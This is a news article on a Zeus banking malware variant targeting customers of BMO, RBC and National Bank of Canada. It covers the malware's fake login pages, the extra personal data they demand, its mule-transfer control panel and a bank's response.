American financial institutions have been the targets of a number of malware attacks in the past 12 months. Now hackers are turning their eyes on banks here.
Security vendor SentinelOne said this week it has found a new variant of the Zeus online banking malware aimed at the Bank of Montreal (BMO), Royal Bank of Canada (RBC) and National bank of Canada.
This variant of Zeus performs is similar to other banking malware that transparently replaces the real login screen page with a fake web page, SentinelOne’s Anton Zukin said in a blog. A victim has no reason to believe they are not on the bank’s real website, he wrote.
This variant, like most banking Trojans, is not detected by anti-virus products, he added. It also bypasses SSL browser security. Because the malware is installed on the endpoint device it can inject fake webpages into a browser without breaking the SSL connection to the bank’s server and generating a security alert.
Customers used to quickly checking the URL will find the fake site starts with HTTPS, which could give a false sense of security.
But careful customers would notice major changes to the login that should tip them off: The fake screen asks for the customers’ social insurance number, data of birth and driver’s licence number, ATM PIN number and mother’s maiden name. While it asks for a credit card number for identification — as the real log-in site does — it also asks for the card’s expiry date and verification number, which the real site doesn’t.
The fake site justifies asking for the additional information with a statement that “In accordance with new protection regulations we have now added an additional layer of security for our customers.”
Asked for a comment, an RBC spokesperson issued the following statement: “Safeguarding our network and the confidentiality of our clients is always a top priority. Our internal Information Security team is aware of the new version of Zeus and is actively monitoring our network to help make sure RBC is protected and our clients have access to our services. As always, we also advise our clients to maintain the security of their systems and adhere to best practices such as changing their passwords and reviewing their transactions.”
Security pros might be interested in the sophistication of the malware. SentinelOne has accessed its control panel, which shows the it includes a form to configure and customize each attack, including the destination bank account to transfer stolen funds, drop name, city, country, IBAN account number and memo about the transaction. The system can automatically calculate the profit percentage the person who is receiving the stolen money (called a Mule) will keep before transferring the balance to the attacker. The attackers can also specify minimum and maximum balances for accounts targeted and minimum and maximum transfer amounts.
Details on each bank account that was attacked including login IDs, browser data, whether login was successful and balance information is also collected.
“This attack continues a growing trend in banking malware that goes beyond simply targeting the victim’s login credentials (i.e. their username and password) and injects pages to steal a wealth of personal information including answers to security questions, debit and credit card numbers, social security number, driver license number and more,” Zukin wrote. “While some of this information can be used to commit online banking fraud, the other personal data can be used for different crimes including healthcare fraud, opening credit accounts in victim’s names, etc. It could even be used in spear phishing attacks to target individuals within enterprises and government agencies in order to breach secure networks.
“It also demonstrates how attackers can now easily repurpose malicious code to target several brands simultaneously.”